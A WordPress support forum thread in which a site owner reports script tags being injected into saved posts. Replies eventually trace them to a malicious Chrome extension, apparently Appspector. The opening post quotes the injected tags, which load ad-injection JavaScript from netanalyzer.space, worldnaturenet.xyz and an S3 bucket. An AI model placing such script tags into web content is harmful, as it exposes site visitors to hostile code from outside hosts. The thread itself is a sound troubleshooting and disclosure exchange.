Support » Fixing WordPress » Amazon AWS Javascript added to every post or page after saving

  • Hi, everytime I save a page/post on WordPress (across multiple sites/logins) a weird script is added to the text box. It looks like this:

    <script src="//s3.amazonaws.com/cashe-js/143e7cdebf193d2764.js" type="text/javascript"></script>

    Page content/text

    <script src="http://netanalyzer.space/addons/lnkr5.min.js" type="text/javascript"></script><script src="http://netanalyzer.space/addons/lnkr30_nt.min.js" type="text/javascript"></script><script src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51847x5182x&r=36" type="text/javascript"></script><script src="http://netanalyzer.space/offers/jonolester.com.js?subid=51847_5182_" type="text/javascript"></script>

    It’s messing up the formatting of my page and I have no idea what it is or how to get rid of it. Has anyone come across this before?

    • This topic was modified 1 year, 7 months ago by Steve Stern.
Viewing 11 replies - 1 through 11 (of 11 total)
  • Moderator t-p

    (@t-p)

    To rule out any theme/plugin conflict, try:
    – deactivating ALL (yes all) plugins temporarily to see if this resolves the problem (plugin functions can interfere). If this works, re-activate them individually (one-by-one) to find the problematic plugin(s).
    – switching to the unedited default Theme (Twenty Seventeen, etc.) for a moment using the WP dashboard to rule out any theme-specific issue (theme functions can interfere like plugins).
    – If you can install plugins, install Health Check. On the troubleshooting tab, you can click the button to disable all plugins and change the theme for you, while you’re still logged in, without affecting normal visitors to your site.

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    I think you’ve been hacked. Install the WordFence plugin and scan your site. If it finds something, then…

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Hi guys,

    Both of your advice is much appreciated. Unfortunately, neither have turned up a solution.

    I moderate sites across 3 or 4 WP admin dashboards, all unrelated to one another – but all are infected with this issue.

    Maybe it’s an issue with a plugin in my Chrome browser or something?

    OK, just checked in Safari and it seems to be a Chrome issue. I’ll investigate at that end. Thanks again for your advice

    Hi,

    I had the same problem as you, but with Firefox. Nothing happened with Chrome.

    I deactivate all Firefox addons, delete the useless ones and then activate them one-by-one.

    Now it is ok.

    I just experienced this. Luckily only while editing a non-production website.

    I disabled this extension, and it seems to have stopped:
    https://chrome.google.com/webstore/detail/appspector/homgcnaoacgigpkkljjjekpignblkeae

    @notabot and @jonolester — can you confirm which plugin/extension you had that was the culprit?

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    Good catch!

    It’s either that one or this one:
    https://chrome.google.com/webstore/detail/finch-developer-tools/phgdjnidddpccdkbedmfifceiljljgdo

    I haven’t been able to reproduce since it first occurred….

    I don’t remember the name exactly but it was an extension to download videos from VK.com played in firefox.

    I have been trying to track this down for a couple of weeks now. Thanks to this post I can confirm it is the ‘Appspector’ chrome extension (https://chrome.google.com/webstore/detail/appspector/homgcnaoacgigpkkljjjekpignblkeae)

    I tested out multiple scenarios and the code will NOT show up when that extension is disabled.

    It is a sneaky hack. It will only add the script if you are in the visual mode, or have a builder. If you are viewing/saving the code in the text mode it won’t insert.

    This is a sad deal as it has been a reliable plugin for years. Need to find another one now.

    I’ve just disabled and deleted Appinspector. After I uninstalled it opened another tab to tell you that your Flash Player is out of date and tries to trick you to download it.

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Amazon AWS Javascript added to every post or page after saving’ is closed to new replies.